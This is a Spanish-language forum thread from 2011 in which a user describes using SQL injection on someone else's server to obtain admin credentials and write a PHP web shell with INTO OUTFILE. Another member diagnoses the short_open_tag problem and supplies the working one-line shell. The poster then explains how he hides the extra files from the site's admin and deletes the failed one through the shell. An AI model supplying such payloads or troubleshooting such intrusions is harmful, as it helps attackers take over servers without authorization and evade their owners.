Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: 4rkn63l en 5 Marzo 2011, 18:35 pm


Título: Shell php a medias
Publicado por: 4rkn63l en 5 Marzo 2011, 18:35 pm
Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell
Código:
<? system($_REQUEST['cmd']); ?>
, pero al intentar ejecutarlo no pasa absolutamente nada, y es obvio q no pase nada por que si veo el codigo fuente de archivo se muestra el codigo php, como si php no lo estuviese parseando.¿A que se debe esto?¿Es que acaso no es suficiente con que el archivo este en algun subdirectorio del arbol web?

Título: Re: Shell php a medias
Publicado por: ~ Yoya ~ en 5 Marzo 2011, 20:49 pm
Explicación de INTO OUTFILE en una Inyección SQL (http://yoyahack.blogspot.com/2010/10/explicacion-de-into-outfile-en-una.html)

Título: Re: Shell php a medias
Publicado por: 4rkn63l en 5 Marzo 2011, 21:55 pm
Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.

Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente.

Título: Re: Shell php a medias
Publicado por: ~ Yoya ~ en 5 Marzo 2011, 22:32 pm
Eso se debe a la directiva short_open_tag, trata de subir el archivo de nuevo pero asi:

Código
  1. <?php system($_REQUEST['cmd']); ?>

Título: Re: Shell php a medias
Publicado por: 4rkn63l en 5 Marzo 2011, 22:55 pm
si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.

Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no??  :xD

Título: Re: Shell php a medias
Publicado por: ~ Yoya ~ en 5 Marzo 2011, 22:57 pm
si claro xD

Título: Re: Shell php a medias
Publicado por: 4rkn63l en 6 Marzo 2011, 00:09 am
Bingo!!  ::)

Muchas gracias ~ Yoya ~ por tu ayuda,la verdad no pensé que el modo de las etiquetas pudiera afectar, leí una info donde efectivamente dice que en php5 no vienen habilitadas las etiquetas cortas que es lo que me hacias mencion anteriormente...pero bueno de los errores se aprende.

Ademas pude borrar el primer archivo sin problemas jejeje.

Título: Re: Shell php a medias
Publicado por: not-all0w3d en 21 Marzo 2011, 22:18 pm
¿Por qué no sólo usaste una backdoor sencilla?..
En fin el problema está solucionado, sólo era una sugerencia.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines